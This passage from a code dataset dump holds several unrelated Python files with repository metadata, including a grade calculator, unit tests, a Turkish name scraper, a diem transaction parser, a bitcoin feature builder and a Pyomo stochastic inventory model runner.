] | null | null | null |
raising_exception_3.py
|
godontop/python-work
|
ea22e0df8b0b17605f5a434e556a388d1f75aa47
|
[
"MIT"
] | null | null | null |
try:
num = 5 / 0
except:
print("An error occured")
raise
| 11.8 | 26 | 0.644068 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.305085 |
1fd7ed8a83b56f175881d6f318fa389d67ee450a
| 732 |
py
|
Python
|
bewerte/muendlich.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
bewerte/muendlich.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
bewerte/muendlich.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
"""Berechnet die mündliche Note"""
import csv
with open('bewertung.csv', encoding='utf-8', mode='r') as bewertung:
TABELLE = []
DATA = csv.reader(bewertung, delimiter=',')
for row in DATA:
TABELLE.append([element.strip() for element in row])
OUTPUT = [TABELLE[0] + ["Note"]]
del TABELLE[0]
for row in TABELLE:
        if len(row) > 5:
note = 20*float(row[2]) + 20*float(row[3]) + 40*float(row[4]) + 20*float(row[5])
note = round(note/25, 0)/4
row = row + [note]
OUTPUT.append(row)
with open('note.csv', encoding='utf-8', mode='w') as safe:
WRITER = csv.writer(safe, delimiter=',')
for row in OUTPUT:
WRITER.writerow(row)
| 31.826087 | 92 | 0.562842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 92 | 0.125512 |
1fd7f7aa485ce2ad0b848a0e2bbaa8cf36a6c24a
| 410 |
py
|
Python
|
python3/tests/test_edit_distance.py
|
qianbinbin/leetcode
|
915cecab0c940cd13847683ec55b17b77eb0f39b
|
[
"MIT"
] | 4 |
2018-03-05T02:27:16.000Z
|
2021-03-15T14:19:44.000Z
|
python3/tests/test_edit_distance.py
|
qianbinbin/leetcode
|
915cecab0c940cd13847683ec55b17b77eb0f39b
|
[
"MIT"
] | null | null | null |
python3/tests/test_edit_distance.py
|
qianbinbin/leetcode
|
915cecab0c940cd13847683ec55b17b77eb0f39b
|
[
"MIT"
] | 2 |
2018-07-22T10:32:10.000Z
|
2018-10-20T03:14:28.000Z
|
from unittest import TestCase
from leetcodepy.edit_distance import *
solution1 = Solution1()
word11 = "horse"
word12 = "ros"
expected1 = 3
word21 = "intention"
word22 = "execution"
expected2 = 5
class TestEditDistance(TestCase):
def test1(self):
self.assertEqual(expected1, solution1.minDistance(word11, word12))
self.assertEqual(expected2, solution1.minDistance(word21, word22))
| 17.083333 | 74 | 0.731707 | 204 | 0.497561 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.082927 |
1fd8f8fea0aa37bc2adfbcbf6dda99e537d99a7f
| 805 |
py
|
Python
|
pageobject/commands/index.py
|
lukas-linhart/pageobject
|
6ae83680ae62a94f93cefc394e4f3cc6999aeead
|
[
"MIT"
] | 1 |
2017-01-12T06:15:36.000Z
|
2017-01-12T06:15:36.000Z
|
pageobject/commands/index.py
|
lukas-linhart/pageobject
|
6ae83680ae62a94f93cefc394e4f3cc6999aeead
|
[
"MIT"
] | null | null | null |
pageobject/commands/index.py
|
lukas-linhart/pageobject
|
6ae83680ae62a94f93cefc394e4f3cc6999aeead
|
[
"MIT"
] | null | null | null |
def index(self, value):
"""
Return index of the first child containing the specified value.
:param str value: text value to look for
:returns: index of the first child containing the specified value
:rtype: int
:raises ValueError: if the value is not found
"""
self.logger.info('getting index of text "{}" within page object list {}'.format(value, self._log_id_short))
self.logger.debug('getting index of text "{}" within page object list; {}'.format(value, self._log_id_long))
index = self.text_values.index(value)
self.logger.info('index of text "{}" within page object list {} is {}'.format(value, self._log_id_short, index))
self.logger.debug('index of text "{}" within page object is {}; {}'.format(value, index, self._log_id_long))
return index
| 47.352941 | 116 | 0.690683 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 474 | 0.58882 |
1fda8ca8896b2d1bcde84055f16e53f955e23e9c
| 2,724 |
py
|
Python
|
vlsopt/data_factory/transaction_factory.py
|
violas-core/bvexchange
|
74cf3197aad02e0f5e2dac457266d11c9c8cc746
|
[
"MIT"
] | null | null | null |
vlsopt/data_factory/transaction_factory.py
|
violas-core/bvexchange
|
74cf3197aad02e0f5e2dac457266d11c9c8cc746
|
[
"MIT"
] | null | null | null |
vlsopt/data_factory/transaction_factory.py
|
violas-core/bvexchange
|
74cf3197aad02e0f5e2dac457266d11c9c8cc746
|
[
"MIT"
] | 1 |
2022-01-05T04:39:47.000Z
|
2022-01-05T04:39:47.000Z
|
#!/usr/bin/python3
import operator
import sys
import json
import os
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "./"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../../"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../../lbdiemsdk/src"))
from diem import (
jsonrpc,
)
from factory_base import (
factory_base,
field
)
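# Flatten diem JSON-RPC payment events into plain dicts (key, sequence number, amount/currency, sender, receiver).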
def parse_events(events):
datas = []
if events:
for event in events:
datas.append({
"key":event.key,
"sequence_number": event.sequence_number,
"data": {
"type": event.data.type,
"amount": {
"amount": event.data.amount.amount,
"currency": event.data.amount.currency,
},
"sender" : event.data.sender,
"receiver": event.data.receiver,
}
})
return datas
def parse_state(state):
return state == "executed"
class transaction_factory(factory_base):
global parse_state
tran_fields = [
field("tran_type", "transaction.type"),
field("script_type", "transaction.script.type"),
field("token_id", "transaction.script.currency"),
field("data", "transaction.script.metadata"),
field("receiver", "transaction.script.receiver"),
field("gas_token", "transaction.gas_currency"),
field("gas_unit_price", "transaction.gas_unit_price"),
field("max_gas_amount", "transaction.max_gas_amount"),
field("amount", "transaction.script.amount"),
field("sequence_number", "transaction.sequence_number"),
field("vm_status", "vm_status.type"),
field("state", "vm_status.type", parse_state),
field("gas_used", "gas_used"),
field("version", "version"),
field("events", "events", parse_events),
]
def __init__(self, data):
factory_base.__init__(self, data)
self.__init_show_fields()
def __init_show_fields(self):
self.set_fields(self.tran_fields)
default_outputs = {"state": "not support",
"events_len" : len(self.events)}
self.extend_default_outputs(default_outputs)
def get_version(self):
return self.get_attr_with_path(self.get_field("version").path)
| 33.62963 | 96 | 0.551762 | 1,521 | 0.55837 | 0 | 0 | 0 | 0 | 0 | 0 | 675 | 0.247797 |
1fdabe81a3501b610902f47c9629b3212106ad89
| 3,746 |
py
|
Python
|
python/tdk_fetch.py
|
selcukcihan/namewizard
|
c2aeb3fd1eb3ce839d0e3a145bdf2a6df354d568
|
[
"CC0-1.0"
] | null | null | null |
python/tdk_fetch.py
|
selcukcihan/namewizard
|
c2aeb3fd1eb3ce839d0e3a145bdf2a6df354d568
|
[
"CC0-1.0"
] | null | null | null |
python/tdk_fetch.py
|
selcukcihan/namewizard
|
c2aeb3fd1eb3ce839d0e3a145bdf2a6df354d568
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python
from BeautifulSoup import BeautifulSoup
import json
import urllib
import urllib2
import re
import time
import os.path
def getgoogleurl(search,siteurl=False):
search = search.encode("utf-8")
if siteurl==False:
return 'http://www.google.com/search?q='+urllib.quote_plus(search)
else:
return 'http://www.google.com/search?q=site:'+urllib.quote_plus(siteurl)+'%20'+urllib.quote_plus(search)
def getgooglelinks(search,siteurl=False):
#google returns 403 without user agent
headers = {'User-agent':'Safari/537.36'}
req = urllib2.Request(getgoogleurl(search,siteurl),None,headers)
site = urllib2.urlopen(req)
data = site.read()
site.close()
m = re.search("([0-9.]+) sonu", data)
count = -1
if m:
count = m.groups()[0].replace(".", "")
return int(count)
names = {}
if os.path.exists("names.txt"):
with open("names.txt") as f:
for line in f.readlines():
tokens = line.split(" ")
names[tokens[0].decode("utf-8")] = (tokens[0].decode("utf-8"), tokens[1] == "1", int(tokens[2]), tokens[3].decode("utf-8"))
f = open("names.txt", 'a+')
print_counter = 0
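# For each name link on a TDK result page, look up an approximate Google hit count and cache
# (name, gender, count, TDK name id), skipping names already loaded from names.txt.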
def handle_span(dct, spans, is_male, fl):
global print_counter
p = re.compile('&uid=(\d+)&')
for span in spans:
n = span.parent.text.split()[0]
m = p.search(span.parent["href"])
nameId = m.group(1)
if n not in dct:
ncnt = -1
for _i in range(5):
try:
ncnt = getgooglelinks(n)
break
except Exception as err:
print err, n
time.sleep(5)
if ncnt == -1:
raise Exception("getgooglelinks not working")
dct[n] = (n, is_male, ncnt, nameId)
fl.write("%s %d %d %s\n" % (n.encode("utf-8"), is_male, ncnt, nameId.encode("utf-8")))
if print_counter % 40 == 0:
print n, is_male, ncnt, nameId
print_counter += 1
else:
print "skipping", n
searching = "aeiou"
beginning = 0
pageno = 1
page = 1
searchforindex = 0
guid = urllib.urlencode({'guid': "TDK.GTS.574eccc8396288.52796697"})
if os.path.exists('names_input.txt'):
with open('names_input.txt') as ini:
beginning, pageno = map(int, ini.readline().split())
try:
for searchforindex in range(beginning, len(searching)):
searchfor = searching[searchforindex]
pagebegin = 1 if searchforindex > beginning else pageno
tokenq = urllib.urlencode({'name': searchfor})
for page in range(pagebegin, 122):
print "fetching", page, "of", searchfor
pageq = urllib.urlencode({'page': page})
url = 'http://tdk.gov.tr/index.php?option=com_kisiadlari&arama=adlar&like=0&cinsi=0&turu=0&%s&%s&%s' % (guid, pageq, tokenq)
response = None
for _i in range(5):
try:
response = urllib.urlopen(url)
break
except Exception as err:
print err
time.sleep(5)
if not response:
raise Exception("urllib.urlopen not working for " + url)
soup = BeautifulSoup(response)
female_spans = soup.body.findAll('span', attrs={'id' : 'cinsiyet1'})
male_spans = soup.body.findAll('span', attrs={'id' : 'cinsiyet2'})
handle_span(names, female_spans, False, f)
handle_span(names, male_spans, True, f)
except Exception as e:
print e.__doc__
print e.message
ini = open("names_input.txt", 'w+')
ini.write("%d %d\n" % (searchforindex, page))
ini.close()
f.close()
| 32.293103 | 136 | 0.570208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 645 | 0.172184 |
1fdadaa704a4a57bab069bbf9519d57e9bc28d25
| 3,703 |
py
|
Python
|
tests/test_source.py
|
j18ter/exchangelib
|
afb0df65c5533999bca92e25be4c00de5c03043c
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_source.py
|
j18ter/exchangelib
|
afb0df65c5533999bca92e25be4c00de5c03043c
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_source.py
|
j18ter/exchangelib
|
afb0df65c5533999bca92e25be4c00de5c03043c
|
[
"BSD-2-Clause"
] | null | null | null |
from exchangelib.errors import (
ErrorAccessDenied,
ErrorFolderNotFound,
ErrorInvalidOperation,
ErrorItemNotFound,
ErrorNoPublicFolderReplicaAvailable,
)
from exchangelib.properties import EWSElement
from .common import EWSTest
class CommonTest(EWSTest):
def test_magic(self):
self.assertIn(self.account.protocol.version.api_version, str(self.account.protocol))
self.assertIn(self.account.protocol.credentials.username, str(self.account.protocol.credentials))
self.assertIn(self.account.primary_smtp_address, str(self.account))
self.assertIn(str(self.account.version.build.major_version), repr(self.account.version))
for item in (
self.account.protocol,
self.account.version,
):
with self.subTest(item=item):
# Just test that these at least don't throw errors
repr(item)
str(item)
for attr in (
"admin_audit_logs",
"archive_deleted_items",
"archive_inbox",
"archive_msg_folder_root",
"archive_recoverable_items_deletions",
"archive_recoverable_items_purges",
"archive_recoverable_items_root",
"archive_recoverable_items_versions",
"archive_root",
"calendar",
"conflicts",
"contacts",
"conversation_history",
"directory",
"drafts",
"favorites",
"im_contact_list",
"inbox",
"journal",
"junk",
"local_failures",
"msg_folder_root",
"my_contacts",
"notes",
"outbox",
"people_connect",
"public_folders_root",
"quick_contacts",
"recipient_cache",
"recoverable_items_deletions",
"recoverable_items_purges",
"recoverable_items_root",
"recoverable_items_versions",
"search_folders",
"sent",
"server_failures",
"sync_issues",
"tasks",
"todo_search",
"trash",
"voice_mail",
):
with self.subTest(attr=attr):
# Test distinguished folder shortcuts. Some may raise ErrorAccessDenied
try:
item = getattr(self.account, attr)
except (
ErrorAccessDenied,
ErrorFolderNotFound,
ErrorItemNotFound,
ErrorInvalidOperation,
ErrorNoPublicFolderReplicaAvailable,
):
continue
else:
repr(item)
str(item)
self.assertTrue(item.is_distinguished)
def test_from_xml(self):
# Test for all EWSElement classes that they handle None as input to from_xml()
import exchangelib
for mod in (
exchangelib.attachments,
exchangelib.extended_properties,
exchangelib.indexed_properties,
exchangelib.folders,
exchangelib.items,
exchangelib.properties,
):
for k, v in vars(mod).items():
with self.subTest(k=k, v=v):
if type(v) is not type:
continue
if not issubclass(v, EWSElement):
continue
# from_xml() does not support None input
with self.assertRaises(Exception):
v.from_xml(elem=None, account=None)
| 34.287037 | 105 | 0.533081 | 3,451 | 0.931947 | 0 | 0 | 0 | 0 | 0 | 0 | 924 | 0.249527 |
1fdb3bda49808628500a9864a821b84e3138f89c
| 735 |
py
|
Python
|
{{cookiecutter.project_slug}}/app/utils/mail.py
|
Bexils/fastapi-project-template
|
1d6937c5adce7603c77e01f8560032082392fdbd
|
[
"MIT"
] | 4 |
2021-04-04T23:19:06.000Z
|
2021-04-10T21:32:23.000Z
|
{{cookiecutter.project_slug}}/app/utils/mail.py
|
Bexils/fastapi-project-template
|
1d6937c5adce7603c77e01f8560032082392fdbd
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/app/utils/mail.py
|
Bexils/fastapi-project-template
|
1d6937c5adce7603c77e01f8560032082392fdbd
|
[
"MIT"
] | null | null | null |
import os
from datetime import datetime
from pathlib import Path
from pydantic import EmailStr
def send_dummy_mail(subject: str, message: str, to: EmailStr):
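    """Write the email out as a .txt file under ./emails/ instead of actually sending it."""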
current_path = os.getcwd()
filename = f'{datetime.now().timestamp()} - {subject}.txt'
email_text = f'''Subject: {subject}
From: [email protected]
To: {to}
{message}
'''
email_path = Path(os.path.join(current_path, 'emails'))
emails_file = os.path.join(current_path, 'emails', filename)
try:
with open(emails_file, 'w') as file_obj:
file_obj.write(email_text)
except FileNotFoundError:
email_path.mkdir()
with open(emails_file, 'w') as file_obj:
file_obj.write(email_text)
return 'email sent!'
| 28.269231 | 64 | 0.672109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 153 | 0.208163 |
1fded2389baa0f710851c0214c487f38445e67b1
| 3,540 |
py
|
Python
|
predict_btc_future.py
|
benjaminshi02003220/Bitcoin_price_prediction
|
f4894614bafa0a4295d08d0b8f53d314c4262724
|
[
"MIT"
] | 6 |
2018-03-11T13:47:22.000Z
|
2018-07-03T05:03:48.000Z
|
predict_btc_future.py
|
benjaminshi02003220/Bitcoin_price_prediction
|
f4894614bafa0a4295d08d0b8f53d314c4262724
|
[
"MIT"
] | null | null | null |
predict_btc_future.py
|
benjaminshi02003220/Bitcoin_price_prediction
|
f4894614bafa0a4295d08d0b8f53d314c4262724
|
[
"MIT"
] | 4 |
2018-03-27T15:38:40.000Z
|
2018-07-07T20:04:29.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 9 17:06:09 2018
@author: v-beshi
"""
import pyodbc
import pandas as pd
def get_agg_data():
con=pyodbc.connect('DRIVER={SQL Server};SERVER=ServerName;DATABASE=DB;UID=ID;PWD=Password')
raw_data=pd.read_sql('select * from dbo.BitcoinTradeHistory',con)
raw_data['USDT_exceed']=raw_data['huobi_USDT']-raw_data['exchange_rate']
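    # Feature engineering: pre_priceN is the fractional change of the ok0330 price over the
    # previous N rows (zero-padded for the first N rows); next_priceN is a binary label for
    # whether the price rises over the following N rows (zero-padded for the last N rows)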
pre_price15=[]
for i in range(0,15):
pre_price15.append(0)
for i in range(15,len(raw_data)):
pre_price15.append((raw_data['ok0330'][i]-raw_data['ok0330'][i-15])/(raw_data['ok0330'][i-15]))
pre_price15=pd.Series(pre_price15,name='pre_price15')
pre_price10=[]
for i in range(0,10):
pre_price10.append(0)
for i in range(10,len(raw_data)):
pre_price10.append((raw_data['ok0330'][i]-raw_data['ok0330'][i-10])/(raw_data['ok0330'][i-10]))
pre_price10=pd.Series(pre_price10,name='pre_price10')
pre_price5=[]
for i in range(0,5):
pre_price5.append(0)
for i in range(5,len(raw_data)):
pre_price5.append((raw_data['ok0330'][i]-raw_data['ok0330'][i-5])/(raw_data['ok0330'][i-5]))
pre_price5=pd.Series(pre_price5,name='pre_price5')
next_price5=[]
for i in range(0,len(raw_data)-5):
if (raw_data['ok0330'][i+5]-raw_data['ok0330'][i])/(raw_data['ok0330'][i])>0:
next_price5.append(1)
else:
next_price5.append(0)
for i in range(0,5):
next_price5.append(0)
next_price5=pd.Series(next_price5,name='next_price5')
next_price10=[]
for i in range(0,len(raw_data)-10):
if (raw_data['ok0330'][i+10]-raw_data['ok0330'][i])/(raw_data['ok0330'][i])>0:
next_price10.append(1)
else:
next_price10.append(0)
for i in range(0,10):
next_price10.append(0)
next_price10=pd.Series(next_price10,name='next_price10')
next_price15=[]
for i in range(0,len(raw_data)-15):
if (raw_data['ok0330'][i+15]-raw_data['ok0330'][i])/(raw_data['ok0330'][i])>0:
next_price15.append(1)
else:
next_price15.append(0)
for i in range(0,15):
next_price15.append(0)
next_price15=pd.Series(next_price15,name='next_price15')
pre_bfx=[0]
for i in range(1,len(raw_data)):
pre_bfx.append((raw_data['bfx_last_price'][i]-raw_data['bfx_last_price'][i-1])/(raw_data['bfx_last_price'][i-1]))
pre_bfx=pd.Series(pre_bfx,name='pre_bfx')
pre_news10=[]
for i in range(0,10):
pre_news10.append(0)
for i in range(10,len(raw_data)):
pre_news10.append((raw_data['news_emotion'][i]-raw_data['news_emotion'][i-10])/(raw_data['news_emotion'][i-10]))
pre_news10=pd.Series(pre_news10,name='pre_news10')
raw_data['bids_wall']=raw_data['bfx_bids_wall']/100
raw_data['asks_wall']=raw_data['bfx_asks_wall']/100
raw_data['total_bids']=raw_data['bfx_total_bids']/100
raw_data['total_asks']=raw_data['bfx_total_asks']/100
raw_data['buy_volumn']=raw_data['bfx_buy_volumn']/50
raw_data['sell_volumn']=raw_data['bfx_sell_volumn']/50
raw_data=raw_data.drop(['ok0330','DateTime','ok_thisweek','huobi_USDT','exchange_rate','bfx_last_price','news_emotion','bfx_bids_wall','bfx_asks_wall','bfx_total_bids','bfx_total_asks','bfx_buy_volumn','bfx_sell_volumn'],axis=1)
agg_data=pd.concat([raw_data,pre_price15,pre_price10,pre_price5,pre_bfx,pre_news10,next_price5,next_price10,next_price15],axis=1)
agg_data=agg_data[15:len(agg_data)-15]
return(agg_data)
| 38.478261 | 232 | 0.664124 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 917 | 0.25904 |
1fe22fd049d8e5e23653953f62233abe237a47e8
| 16,692 |
py
|
Python
|
bloodbank_rl/pyomo_models/stochastic_model_runner.py
|
joefarrington/bloodbank_rl
|
f285581145034b498f01c9b44f95437ceddb042a
|
[
"MIT"
] | null | null | null |
bloodbank_rl/pyomo_models/stochastic_model_runner.py
|
joefarrington/bloodbank_rl
|
f285581145034b498f01c9b44f95437ceddb042a
|
[
"MIT"
] | null | null | null |
bloodbank_rl/pyomo_models/stochastic_model_runner.py
|
joefarrington/bloodbank_rl
|
f285581145034b498f01c9b44f95437ceddb042a
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import pyomo.environ as pyo
import mpisppy.utils.sputils as sputils
from mpisppy.opt.ef import ExtensiveForm
from pathlib import Path
import os
import sys
path_root = Path(os.path.abspath(__file__)).parents[2]
sys.path.append(str(path_root))
from bloodbank_rl.environments.platelet_bankSR import PoissonDemandProviderSR
import bloodbank_rl.pyomo_models.model_constructors as pyomo_mc
class PyomoModelRunner:
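    """Builds one Pyomo scenario per demand seed, solves the extensive-form stochastic
    program with mpi-sppy, and collects per-scenario results, costs and consistency checks."""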
def __init__(
self,
model_constructor,
model_constructor_params,
n_scenarios,
demand_provider,
demand_provider_kwargs=None,
scenario_name_start=0, # Used this as starting seed for Pyomo experiments with sim data
solver_string="gurobi_persistent",
solver_options={"LogFile": "gurobi.log", "OutputFlag": 1, "LogToConsole": 0},
log=None,
):
self.model_constructor = model_constructor
self.model_constructor_params = model_constructor_params
self.n_scenarios = n_scenarios
self.demand_provider = demand_provider
self.demand_provider_kwargs = demand_provider_kwargs
self.scenario_name_start = scenario_name_start
self.solver_string = solver_string
self.solver_options = solver_options
self.all_scenario_names = [
f"{i+self.scenario_name_start}" for i in range(0, self.n_scenarios)
]
self.checks_to_perform = self._determine_checks_to_perform()
self.log = log
def scenario_creator(self, scenario_name):
if self.demand_provider_kwargs:
prov = self.demand_provider(
**self.demand_provider_kwargs, seed=int(scenario_name)
)
else:
prov = self.demand_provider(seed=int(scenario_name))
prov.reset()
demand = {
t: prov.generate_demand()
for t in range(1, self.model_constructor_params["t_max"] + 1)
}
model = self.model_constructor(
demand=demand, **self.model_constructor_params
).build_model()
# Telling it which decisions belong to first stage - for us this could be all our policy parameters
# because we can't change them during a trajectory
first_stage_params = self._get_first_stage_decision_params(model)
sputils.attach_root_node(model, 0, first_stage_params)
# If we don't specify, assume that all equally likely
model._mpisppy_probability = 1.0 / self.n_scenarios
return model
def _get_first_stage_decision_params(self, model):
if self.model_constructor.policy_parameters() == ["s", "S"]:
return [model.s, model.S]
elif self.model_constructor.policy_parameters() == ["s", "Q"]:
return [model.s, model.Q]
elif self.model_constructor.policy_parameters() == ["s", "S", "alpha", "Q"]:
return [model.s, model.S, model.alpha, model.Q]
elif self.model_constructor.policy_parameters() == ["s", "S", "beta", "Q"]:
return [model.s, model.S, model.beta, model.Q]
elif self.model_constructor.policy_parameters() == ["S"]:
return [model.S]
else:
raise ValueError("Policy parameters not recognised")
def solve_program(self):
options = {"solver": self.solver_string}
self.ef = ExtensiveForm(
options=options,
all_scenario_names=self.all_scenario_names,
scenario_creator=self.scenario_creator,
)
self.results = self.ef.solve_extensive_form(solver_options=self.solver_options)
objval = self.ef.get_objective_value()
return objval
def construct_results_dfs(self):
self.results_list = []
self.costs_df = pd.DataFrame(
columns=[
"Seed",
"Variable cost",
"Holding cost",
"Fixed cost",
"Wastage cost",
"Shortage cost",
]
)
for tup in self.ef.scenarios():
scen = tup[0]
if self.demand_provider_kwargs:
prov = self.demand_provider(
**self.demand_provider_kwargs, seed=int(scen)
)
else:
prov = self.demand_provider(seed=int(scen))
prov.reset()
demand = {
t: prov.generate_demand()
for t in range(1, self.model_constructor_params["t_max"] + 1)
}
model = tup[1]
# Add common variables to output
res_dicts = [
{
"opening_inventory": [
round(model.IssB[t, a](), 0) for a in model.A
],
"received": [round(model.X[t, a](), 0) for a in model.A],
"demand": round(demand[t], 0),
"DSSR": [round(model.DssR[t, a](), 0) for a in model.A],
"wastage": round(model.W[t](), 0),
"shortage": round(model.E[t](), 0),
"closing inventory": [
round(model.IssE[t, a](), 0) for a in model.A
],
"inventory position": round(model.IP[t](), 0),
"order quantity": round(model.OQ[t](), 0),
}
for t in model.T
]
            # Add policy parameters to results
for res_dict, t in zip(res_dicts, model.T):
for param in self.model_constructor.policy_parameters():
if self.model_constructor_params["weekly_policy"]:
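                        # A weekly policy shares one parameter value per day of the week, so index by (t - 1) mod 7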
param_string = f"model.{param}[(t-1) % 7]()"
else:
param_string = f"model.{param}[t]()"
res_dict[f"{param}"] = round(eval(param_string), 0)
self.results_list.append(pd.DataFrame(res_dicts))
# Record the costs for each scenario and store in a single Pandas DataFrame
scen_costs_dict = {
"Seed": scen,
"Variable cost": round(model.variable_cost(), 0),
"Holding cost": round(model.holding_cost(), 0),
"Fixed cost": round(model.fixed_cost(), 0),
"Wastage cost": round(model.wastage_cost(), 0),
"Shortage cost": round(model.shortage_cost(), 0),
}
self.costs_df = self.costs_df.append(scen_costs_dict, ignore_index=True)
if self.log is not None:
self.log.info(f"##### Scenario {scen} #####")
self.log.info(f"Variable cost: {round(model.variable_cost(),0)}")
self.log.info(f"Holding cost: {round(model.holding_cost(),0)}")
self.log.info(f"Fixed cost: {round(model.fixed_cost(),0)}")
self.log.info(f"Wastage cost: {round(model.wastage_cost(),0)}")
self.log.info(f"Shortage cost: {round(model.shortage_cost(),0)}")
else:
print(f"##### Scenario {scen} #####")
# For now, also print the costs as useful for debugging
print(f"Variable cost: {round(model.variable_cost(),0)}")
print(f"Holding cost: {round(model.holding_cost(),0)}")
print(f"Fixed cost: {round(model.fixed_cost(),0)}")
print(f"Wastage cost: {round(model.wastage_cost(),0)}")
print(f"Shortage cost: {round(model.shortage_cost(),0)}")
def save_results(self, directory_path_string):
for scen, df in zip(self.all_scenario_names, self.results_list):
filename = Path(directory_path_string) / f"scenario_{scen}_output.csv"
df.to_csv(filename)
        filename = Path(directory_path_string) / "all_costs.csv"
self.costs_df.to_csv(filename)
def check_outputs(self, directory_path_string):
self.results_of_checks_list = []
for scen, scenario_df in zip(self.all_scenario_names, self.results_list):
# Ensure that entries in columns with array values are numpy arrays
array_cols = ["opening_inventory", "received", "DSSR", "closing inventory"]
for col in array_cols:
scenario_df[f"{col}"] = scenario_df[f"{col}"].apply(
lambda x: np.array(x)
)
# Do a merge to easily run checks where we look at consecutive rows
merged_results = pd.concat(
[
scenario_df,
scenario_df.loc[:, ["opening_inventory", "received"]]
.shift(-1)
.add_prefix("next_"),
],
axis=1,
)
# Run the necessary checks
out_df = pd.DataFrame()
for f in self.checks_to_perform:
res = merged_results.apply(f, axis=1)
out_df = pd.concat([out_df, res], axis=1)
# Print the number of rows with failure and store
# the results if any failures for a scenario
fail_check_rows = out_df[~out_df.all(axis=1)]
n_rows_with_fail = fail_check_rows.shape[0]
if self.log is not None:
self.log.info(
f"Scenario {scen}: {n_rows_with_fail} rows with a failed check"
)
else:
print(f"Scenario {scen}: {n_rows_with_fail} rows with a failed check")
if n_rows_with_fail > 0:
filename = Path(directory_path_string) / f"scenario_{scen}_checks.csv"
out_df.to_csv(filename)
self.results_of_checks_list.append(out_df)
### Functions for checking the output is consistent with constraints ###
# TODO: Could run a check that policy params same in each scenario
def _determine_checks_to_perform(self):
checks_to_run = [
self._check_wastage,
self._check_shortage,
self._check_inventory_during_day,
self._check_no_max_age_opening_inventory,
self._check_close_to_next_open_inventory,
self._check_order_to_next_received,
]
if self.model_constructor.policy_parameters() == ["s", "S"]:
return checks_to_run + [self._check_sS]
elif self.model_constructor.policy_parameters() == ["s", "Q"]:
return checks_to_run + [self._check_sQ]
elif self.model_constructor.policy_parameters() == ["s", "S", "alpha", "Q"]:
return checks_to_run + [self._check_sSaQ]
elif self.model_constructor.policy_parameters() == ["s", "S", "beta", "Q"]:
return checks_to_run + [self._check_sSbQ]
elif self.model_constructor.policy_parameters() == ["S"]:
return checks_to_run + [self._check_S]
else:
raise ValueError("Policy parameters not recognised")
# High level wastage check
def _check_wastage(self, row):
return pd.Series(
{
"check_wastage": row["wastage"]
== max(
0, row["opening_inventory"][0] + row["received"][0] - row["demand"]
)
}
)
# High level shortage check
def _check_shortage(self, row):
return pd.Series(
{
"check_shortage": row["shortage"]
== max(
0,
row["demand"]
- row["opening_inventory"].sum()
- row["received"].sum(),
)
}
)
# Check closing inventory
def _calculate_remaining_stock_and_demand(self, row):
total_remaining_demand = row["demand"]
inventory = row["opening_inventory"] + row["received"]
remaining_demand = np.zeros_like(inventory)
for idx, stock in enumerate(inventory):
demand_filled = min(total_remaining_demand, stock)
remaining_stock = stock - demand_filled
total_remaining_demand = total_remaining_demand - demand_filled
inventory[idx] = remaining_stock
remaining_demand[idx] = total_remaining_demand
return inventory, remaining_demand
def _check_inventory_during_day(self, row):
(
calc_closing_inventory,
calc_remaining_demand,
) = self._calculate_remaining_stock_and_demand(row)
return pd.Series(
{
"check_closing_inventory": (
row["closing inventory"] == calc_closing_inventory
).all(),
"check_DSSR": (row["DSSR"] == calc_remaining_demand).all(),
"check_inventory_position": row["inventory position"]
== row["closing inventory"][1:].sum(),
}
)
def _check_no_max_age_opening_inventory(self, row):
return pd.Series(
{"check_no_max_age_opening_inventory": row["opening_inventory"][-1] == 0}
)
def _check_close_to_next_open_inventory(self, row):
if row["next_opening_inventory"] is np.nan:
return pd.Series({"check_close_to_next_open_inventory": None})
else:
return pd.Series(
{
"check_close_to_next_open_inventory": (
row["closing inventory"][1:]
== row["next_opening_inventory"][:-1]
).all()
}
)
def _check_order_to_next_received(self, row):
if row["next_received"] is np.nan:
return pd.Series({"check_order_to_next_received": None})
else:
return pd.Series(
{
"check_order_to_next_received": row["order quantity"]
== row["next_received"].sum()
}
)
def _check_sS(self, row):
S_gt_s = row["S"] >= row["s"] + 1
if row["inventory position"] < row["s"]:
order_quantity_to_params = (
row["order quantity"] == row["S"] - row["inventory position"]
)
else:
order_quantity_to_params = row["order quantity"] == 0
return pd.Series(
{
"check_sS_S_gt_s": S_gt_s,
"check_sS_order_quantity_to_params": order_quantity_to_params,
}
)
def _check_S(self, row):
if row["inventory position"] < row["S"]:
order_quantity_to_params = (
row["order quantity"] == row["S"] - row["inventory position"]
)
else:
order_quantity_to_params = row["order quantity"] == 0
return pd.Series(
{"check_S_order_quantity_to_params": order_quantity_to_params,}
)
def _check_sQ(self, row):
if row["inventory position"] < row["s"]:
order_quantity_to_params = row["order quantity"] == row["Q"]
else:
order_quantity_to_params = row["order quantity"] == 0
return pd.Series(
{"check_sQ_order_quantity_to_params": order_quantity_to_params}
)
def _check_sSaQ(self, row):
S_gt_s = row["S"] >= row["s"] + 1
s_gt_a = row["s"] >= row["alpha"] + 1
if row["inventory position"] < row["alpha"]:
order_quantity_to_params = (
row["order quantity"] == row["S"] - row["inventory position"]
)
elif row["inventory position"] < row["s"]:
order_quantity_to_params = row["order quantity"] == row["Q"]
else:
order_quantity_to_params = row["order quantity"] == 0
